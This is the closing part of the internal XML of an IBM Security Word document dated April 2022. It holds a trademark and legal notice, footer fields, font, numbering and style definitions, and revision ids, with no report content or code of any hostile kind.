                        </w:rPr>
                        <w:t>IBM, the IBM logo, ibm.com, and IBM X-Force are trademarks or registered trademarks of International Business Machines Corporation in the United States, other countries, or both. If these and other IBM trademarked terms are marked on their first occurrence in this information with a trademark symbol (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:position w:val="-1"/>
                        </w:rPr>
                        <w:t>®</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t xml:space="preserve">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w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:rFonts w:cs="HelvNeueRomanforIBM"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>ibm.com/legal/copytrade.shtml</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5585848B" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Other product, company or service names may be trademarks or service marks of others.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E3AB750" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRPr="00B46757" w:rsidRDefault="00F217E1" w:rsidP="00183787">
                      <w:pPr>
                        <w:pStyle w:val="legalcopyfirstparagraphOther"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>References in this publication to IBM products or services do not</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B46757">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:br/>
                        <w:t>imply that IBM intends to make them available in all countries in which IBM operates.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E899A" w14:textId="487AF6B5" w:rsidR="00000ECD" w:rsidRPr="00652B88" w:rsidRDefault="00000ECD" w:rsidP="0077681B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00000ECD" w:rsidRPr="00652B88" w:rsidSect="00A50C29">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E23B9" w14:textId="77777777" w:rsidR="00197C7A" w:rsidRDefault="00197C7A" w:rsidP="0077681B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="076047F1" w14:textId="77777777" w:rsidR="00197C7A" w:rsidRDefault="00197C7A"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Neue Bold for IBM">
    <w:altName w:val="Arial"/>
    <w:charset w:val="4D"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800000AF" w:usb1="5000204A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000093" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="IBM Plex Sans">
    <w:panose1 w:val="020B0503050203000203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A000026F" w:usb1="5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IBM Plex Sans Light">
    <w:panose1 w:val="020B0403050203000203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A000026F" w:usb1="5000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000197"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ansonTextLTPro-Roman">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="4D"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A000002F" w:usb1="5000205A" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="HelvNeueRomanforIBM">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="4D"/>
    <w:family w:val="swiss"/>
    <w:notTrueType/>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0141F" w14:textId="09C0951F" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="00A50C29">
    <w:pPr>
      <w:pStyle w:val="IBMTextStyle1"/>
      <w:tabs>
        <w:tab w:val="right" w:pos="10710"/>
      </w:tabs>
    </w:pPr>
    <w:r w:rsidRPr="00DC144C">
      <w:t xml:space="preserve">IBM Security | </w:t>
    </w:r>
    <w:r w:rsidRPr="00DC144C">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00DC144C">
      <w:instrText xml:space="preserve"> DATE  \@ "MMMM d, yyyy"  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00DC144C">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:t>April 13, 2022</w:t>
    </w:r>
    <w:r w:rsidRPr="00DC144C">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00DC144C">
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00163146">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00163146">
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00163146">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002716BE">
      <w:t>14</w:t>
    </w:r>
    <w:r w:rsidRPr="0016314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EC4D1" w14:textId="77777777" w:rsidR="00197C7A" w:rsidRDefault="00197C7A" w:rsidP="0077681B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3371C25C" w14:textId="77777777" w:rsidR="00197C7A" w:rsidRDefault="00197C7A"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E5B40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="543871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05FC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FEC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177F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="518A78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61942"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AAA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61389"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FEA7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B5E58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FC65F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CA582C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BB4D2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8711E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4B8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235B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28C6B2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3CCC28CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D880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E73184"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD24C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D2CE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71B469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06636D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1BEF1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81451D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C38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D215B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="428ED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F6617"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="977A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E67C6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC241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846A4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="521A3C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50D14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7AC7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1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2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5A0"/>
    <w:rsid w:val="00000ECD"/>
    <w:rsid w:val="000055CD"/>
    <w:rsid w:val="00014CF4"/>
    <w:rsid w:val="00025247"/>
    <w:rsid w:val="0002648C"/>
    <w:rsid w:val="000412C5"/>
    <w:rsid w:val="000431AE"/>
    <w:rsid w:val="000518FA"/>
    <w:rsid w:val="00057784"/>
    <w:rsid w:val="00061AF8"/>
    <w:rsid w:val="000845A5"/>
    <w:rsid w:val="000961AE"/>
    <w:rsid w:val="000B11EE"/>
    <w:rsid w:val="000B4C4D"/>
    <w:rsid w:val="000D0AA3"/>
    <w:rsid w:val="000D4BEB"/>
    <w:rsid w:val="000D58CF"/>
    <w:rsid w:val="000F48E5"/>
    <w:rsid w:val="001070AF"/>
    <w:rsid w:val="00113736"/>
    <w:rsid w:val="00113FDA"/>
    <w:rsid w:val="001172D9"/>
    <w:rsid w:val="00117920"/>
    <w:rsid w:val="001355D0"/>
    <w:rsid w:val="00146610"/>
    <w:rsid w:val="0015770E"/>
    <w:rsid w:val="00162B50"/>
    <w:rsid w:val="00163146"/>
    <w:rsid w:val="001677DD"/>
    <w:rsid w:val="001734D6"/>
    <w:rsid w:val="00174825"/>
    <w:rsid w:val="001759DE"/>
    <w:rsid w:val="00177D7B"/>
    <w:rsid w:val="00181902"/>
    <w:rsid w:val="00183787"/>
    <w:rsid w:val="0018398A"/>
    <w:rsid w:val="00192D19"/>
    <w:rsid w:val="00197C7A"/>
    <w:rsid w:val="001A36FC"/>
    <w:rsid w:val="001A3DB5"/>
    <w:rsid w:val="001A3E04"/>
    <w:rsid w:val="001A6A55"/>
    <w:rsid w:val="001C6505"/>
    <w:rsid w:val="001C7448"/>
    <w:rsid w:val="001D3CC7"/>
    <w:rsid w:val="001D5BD2"/>
    <w:rsid w:val="001F01E1"/>
    <w:rsid w:val="001F241B"/>
    <w:rsid w:val="001F761D"/>
    <w:rsid w:val="00200F0C"/>
    <w:rsid w:val="002063AD"/>
    <w:rsid w:val="00212A91"/>
    <w:rsid w:val="00212C5F"/>
    <w:rsid w:val="002141C9"/>
    <w:rsid w:val="00216102"/>
    <w:rsid w:val="0022743A"/>
    <w:rsid w:val="002377A5"/>
    <w:rsid w:val="00240992"/>
    <w:rsid w:val="00263865"/>
    <w:rsid w:val="00264073"/>
    <w:rsid w:val="002701A8"/>
    <w:rsid w:val="00270CA5"/>
    <w:rsid w:val="002716BE"/>
    <w:rsid w:val="002809B7"/>
    <w:rsid w:val="00292FA0"/>
    <w:rsid w:val="00294D65"/>
    <w:rsid w:val="002A0004"/>
    <w:rsid w:val="002A2083"/>
    <w:rsid w:val="002B74CE"/>
    <w:rsid w:val="002C1CFF"/>
    <w:rsid w:val="002C3142"/>
    <w:rsid w:val="002C57DA"/>
    <w:rsid w:val="002D1D51"/>
    <w:rsid w:val="002D3EB9"/>
    <w:rsid w:val="002E6AC5"/>
    <w:rsid w:val="002F0894"/>
    <w:rsid w:val="002F7C8A"/>
    <w:rsid w:val="00302578"/>
    <w:rsid w:val="00305387"/>
    <w:rsid w:val="00306A97"/>
    <w:rsid w:val="0033049A"/>
    <w:rsid w:val="00337ECD"/>
    <w:rsid w:val="00345EE8"/>
    <w:rsid w:val="0035035A"/>
    <w:rsid w:val="00361E91"/>
    <w:rsid w:val="00364126"/>
    <w:rsid w:val="00375F72"/>
    <w:rsid w:val="00384703"/>
    <w:rsid w:val="00384B85"/>
    <w:rsid w:val="00385873"/>
    <w:rsid w:val="003956F3"/>
    <w:rsid w:val="0039706F"/>
    <w:rsid w:val="003A1950"/>
    <w:rsid w:val="003C01C2"/>
    <w:rsid w:val="003C1DA9"/>
    <w:rsid w:val="003D27A3"/>
    <w:rsid w:val="003D65A9"/>
    <w:rsid w:val="003D7345"/>
    <w:rsid w:val="003E4F40"/>
    <w:rsid w:val="003F293F"/>
    <w:rsid w:val="003F75CC"/>
    <w:rsid w:val="004021E3"/>
    <w:rsid w:val="00433EA4"/>
    <w:rsid w:val="004340A2"/>
    <w:rsid w:val="004424C4"/>
    <w:rsid w:val="004474EC"/>
    <w:rsid w:val="00451AEA"/>
    <w:rsid w:val="0045340D"/>
    <w:rsid w:val="00461B35"/>
    <w:rsid w:val="00462E9B"/>
    <w:rsid w:val="00471ACE"/>
    <w:rsid w:val="00483F51"/>
    <w:rsid w:val="004860EB"/>
    <w:rsid w:val="00493B5C"/>
    <w:rsid w:val="004B08B8"/>
    <w:rsid w:val="004B5168"/>
    <w:rsid w:val="004B5B32"/>
    <w:rsid w:val="004C0ABE"/>
    <w:rsid w:val="004C3836"/>
    <w:rsid w:val="004C7582"/>
    <w:rsid w:val="004E1ADE"/>
    <w:rsid w:val="004E60BF"/>
    <w:rsid w:val="004E7B48"/>
    <w:rsid w:val="0050093B"/>
    <w:rsid w:val="00502FBA"/>
    <w:rsid w:val="00511C7B"/>
    <w:rsid w:val="005211F9"/>
    <w:rsid w:val="005461CF"/>
    <w:rsid w:val="00551FC5"/>
    <w:rsid w:val="005614AF"/>
    <w:rsid w:val="0058445B"/>
    <w:rsid w:val="00584516"/>
    <w:rsid w:val="00584762"/>
    <w:rsid w:val="005A09C8"/>
    <w:rsid w:val="005A1A9F"/>
    <w:rsid w:val="005A20FE"/>
    <w:rsid w:val="005B4BE0"/>
    <w:rsid w:val="005B522D"/>
    <w:rsid w:val="005B6F7C"/>
    <w:rsid w:val="005C2575"/>
    <w:rsid w:val="005C68C9"/>
    <w:rsid w:val="005D4E4E"/>
    <w:rsid w:val="005D6197"/>
    <w:rsid w:val="005E49AA"/>
    <w:rsid w:val="006023A1"/>
    <w:rsid w:val="006124A4"/>
    <w:rsid w:val="00615581"/>
    <w:rsid w:val="0061577C"/>
    <w:rsid w:val="00623C41"/>
    <w:rsid w:val="006373AA"/>
    <w:rsid w:val="00643E75"/>
    <w:rsid w:val="006508E9"/>
    <w:rsid w:val="006512A7"/>
    <w:rsid w:val="00652B88"/>
    <w:rsid w:val="00666D18"/>
    <w:rsid w:val="00667560"/>
    <w:rsid w:val="00672F0C"/>
    <w:rsid w:val="00677006"/>
    <w:rsid w:val="00681369"/>
    <w:rsid w:val="006844D1"/>
    <w:rsid w:val="00684D13"/>
    <w:rsid w:val="00694BB9"/>
    <w:rsid w:val="006A18B7"/>
    <w:rsid w:val="006A511A"/>
    <w:rsid w:val="006B4D74"/>
    <w:rsid w:val="006B71CB"/>
    <w:rsid w:val="006B7E5C"/>
    <w:rsid w:val="006C75CF"/>
    <w:rsid w:val="006F0486"/>
    <w:rsid w:val="006F5160"/>
    <w:rsid w:val="0074380A"/>
    <w:rsid w:val="0075241B"/>
    <w:rsid w:val="00755B8C"/>
    <w:rsid w:val="00755DCA"/>
    <w:rsid w:val="00764AB5"/>
    <w:rsid w:val="0076506E"/>
    <w:rsid w:val="00772F45"/>
    <w:rsid w:val="0077681B"/>
    <w:rsid w:val="00776C39"/>
    <w:rsid w:val="00780F91"/>
    <w:rsid w:val="007925CB"/>
    <w:rsid w:val="007B0E99"/>
    <w:rsid w:val="007C5635"/>
    <w:rsid w:val="007C7FC1"/>
    <w:rsid w:val="007D3E70"/>
    <w:rsid w:val="007D4391"/>
    <w:rsid w:val="00803A27"/>
    <w:rsid w:val="00815B2C"/>
    <w:rsid w:val="00817A4D"/>
    <w:rsid w:val="00837A57"/>
    <w:rsid w:val="00843E67"/>
    <w:rsid w:val="0084610A"/>
    <w:rsid w:val="00851025"/>
    <w:rsid w:val="00860A92"/>
    <w:rsid w:val="00864367"/>
    <w:rsid w:val="008649C1"/>
    <w:rsid w:val="00867008"/>
    <w:rsid w:val="008763A2"/>
    <w:rsid w:val="0089109E"/>
    <w:rsid w:val="008A019F"/>
    <w:rsid w:val="008A3D57"/>
    <w:rsid w:val="008A6790"/>
    <w:rsid w:val="008C3FC6"/>
    <w:rsid w:val="009040F4"/>
    <w:rsid w:val="00922E7D"/>
    <w:rsid w:val="0093551D"/>
    <w:rsid w:val="00950F34"/>
    <w:rsid w:val="0096302A"/>
    <w:rsid w:val="00983169"/>
    <w:rsid w:val="00984A6B"/>
    <w:rsid w:val="00994D7D"/>
    <w:rsid w:val="009A7412"/>
    <w:rsid w:val="009B0A6E"/>
    <w:rsid w:val="009C06F5"/>
    <w:rsid w:val="009C298F"/>
    <w:rsid w:val="00A03984"/>
    <w:rsid w:val="00A055E1"/>
    <w:rsid w:val="00A10B18"/>
    <w:rsid w:val="00A26E71"/>
    <w:rsid w:val="00A37F91"/>
    <w:rsid w:val="00A50C29"/>
    <w:rsid w:val="00A568FF"/>
    <w:rsid w:val="00A679F2"/>
    <w:rsid w:val="00A81860"/>
    <w:rsid w:val="00A818BF"/>
    <w:rsid w:val="00AB018D"/>
    <w:rsid w:val="00AC0ED9"/>
    <w:rsid w:val="00AE1C4C"/>
    <w:rsid w:val="00AE3B7B"/>
    <w:rsid w:val="00AF1FBC"/>
    <w:rsid w:val="00AF3011"/>
    <w:rsid w:val="00B04A5E"/>
    <w:rsid w:val="00B10F21"/>
    <w:rsid w:val="00B15787"/>
    <w:rsid w:val="00B20CCB"/>
    <w:rsid w:val="00B2696A"/>
    <w:rsid w:val="00B33A7D"/>
    <w:rsid w:val="00B34758"/>
    <w:rsid w:val="00B34ADC"/>
    <w:rsid w:val="00B46757"/>
    <w:rsid w:val="00B50D53"/>
    <w:rsid w:val="00B5634E"/>
    <w:rsid w:val="00B64A67"/>
    <w:rsid w:val="00B73AD8"/>
    <w:rsid w:val="00B80477"/>
    <w:rsid w:val="00B814A1"/>
    <w:rsid w:val="00B84E66"/>
    <w:rsid w:val="00B909E6"/>
    <w:rsid w:val="00B959A6"/>
    <w:rsid w:val="00BC4E0E"/>
    <w:rsid w:val="00BC5548"/>
    <w:rsid w:val="00BD0179"/>
    <w:rsid w:val="00BE151B"/>
    <w:rsid w:val="00BF01C9"/>
    <w:rsid w:val="00BF1CD0"/>
    <w:rsid w:val="00BF1D6B"/>
    <w:rsid w:val="00C009EB"/>
    <w:rsid w:val="00C151D1"/>
    <w:rsid w:val="00C167DB"/>
    <w:rsid w:val="00C248B9"/>
    <w:rsid w:val="00C3195F"/>
    <w:rsid w:val="00C36CA2"/>
    <w:rsid w:val="00C41BC9"/>
    <w:rsid w:val="00C53343"/>
    <w:rsid w:val="00C54290"/>
    <w:rsid w:val="00C652B1"/>
    <w:rsid w:val="00CC0685"/>
    <w:rsid w:val="00CC48B5"/>
    <w:rsid w:val="00CE033B"/>
    <w:rsid w:val="00CE538B"/>
    <w:rsid w:val="00CE5DB4"/>
    <w:rsid w:val="00D149A6"/>
    <w:rsid w:val="00D15DCC"/>
    <w:rsid w:val="00D32396"/>
    <w:rsid w:val="00D323CF"/>
    <w:rsid w:val="00D47111"/>
    <w:rsid w:val="00D52EDF"/>
    <w:rsid w:val="00D53F1D"/>
    <w:rsid w:val="00D5408B"/>
    <w:rsid w:val="00D557AA"/>
    <w:rsid w:val="00D764FC"/>
    <w:rsid w:val="00DB3DDB"/>
    <w:rsid w:val="00DB4911"/>
    <w:rsid w:val="00DB4E5A"/>
    <w:rsid w:val="00DC144C"/>
    <w:rsid w:val="00DC1843"/>
    <w:rsid w:val="00DC1FD8"/>
    <w:rsid w:val="00DC6502"/>
    <w:rsid w:val="00DD0105"/>
    <w:rsid w:val="00DD15A0"/>
    <w:rsid w:val="00DD7F1A"/>
    <w:rsid w:val="00DE77F4"/>
    <w:rsid w:val="00DE7970"/>
    <w:rsid w:val="00DF2031"/>
    <w:rsid w:val="00E27633"/>
    <w:rsid w:val="00E331E2"/>
    <w:rsid w:val="00E363A0"/>
    <w:rsid w:val="00E508D2"/>
    <w:rsid w:val="00E53ABB"/>
    <w:rsid w:val="00E723C3"/>
    <w:rsid w:val="00E745D0"/>
    <w:rsid w:val="00EA332D"/>
    <w:rsid w:val="00EA77E8"/>
    <w:rsid w:val="00EC0271"/>
    <w:rsid w:val="00EC06F3"/>
    <w:rsid w:val="00EC57EA"/>
    <w:rsid w:val="00ED34E3"/>
    <w:rsid w:val="00ED7F95"/>
    <w:rsid w:val="00EF1786"/>
    <w:rsid w:val="00EF73E5"/>
    <w:rsid w:val="00F00ADC"/>
    <w:rsid w:val="00F01250"/>
    <w:rsid w:val="00F022ED"/>
    <w:rsid w:val="00F06423"/>
    <w:rsid w:val="00F13DC0"/>
    <w:rsid w:val="00F217E1"/>
    <w:rsid w:val="00F267A8"/>
    <w:rsid w:val="00F47696"/>
    <w:rsid w:val="00F65CA7"/>
    <w:rsid w:val="00F706CE"/>
    <w:rsid w:val="00F74237"/>
    <w:rsid w:val="00F80627"/>
    <w:rsid w:val="00F83F74"/>
    <w:rsid w:val="00FA40EE"/>
    <w:rsid w:val="00FB12FD"/>
    <w:rsid w:val="00FB290C"/>
    <w:rsid w:val="00FB4C65"/>
    <w:rsid w:val="00FB6559"/>
    <w:rsid w:val="00FC7A61"/>
    <w:rsid w:val="00FC7D1C"/>
    <w:rsid w:val="00FD0043"/>
    <w:rsid w:val="00FE67D1"/>
    <w:rsid w:val="00FF4237"/>
    <w:rsid w:val="00FF6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A6F92880-0215-43D2-9C70-D9A12AD26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1A6A55"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0077681B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="IBM Plex Sans Light" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D6197"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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1A6A55"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>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7681B"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans Light" w:eastAsiaTheme="majorEastAsia" w:hAnsi="IBM Plex Sans Light" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D6197"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="IBM Plex Sans" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i w:val="0"/>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customStyle="1" w:styleId="Hashtag1">
    <w:name w:val="Hashtag1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C167DB"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C167DB"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:b w:val="0"/>
      <w:i w:val="0"/>
      <w:color w:val="605E5C"/>
      <w:sz w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="legalcopyfirstparagraphOther">
    <w:name w:val="legal copy (first paragraph) (Other)"/>
    <w:basedOn w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B46757"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="120" w:after="144" w:line="195" w:lineRule="atLeast"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="JansonTextLTPro-Roman"/>
      <w:iCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B46757"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B46757"/>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:sz w:val="22"/>
      <w:lang w:bidi="he-IL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
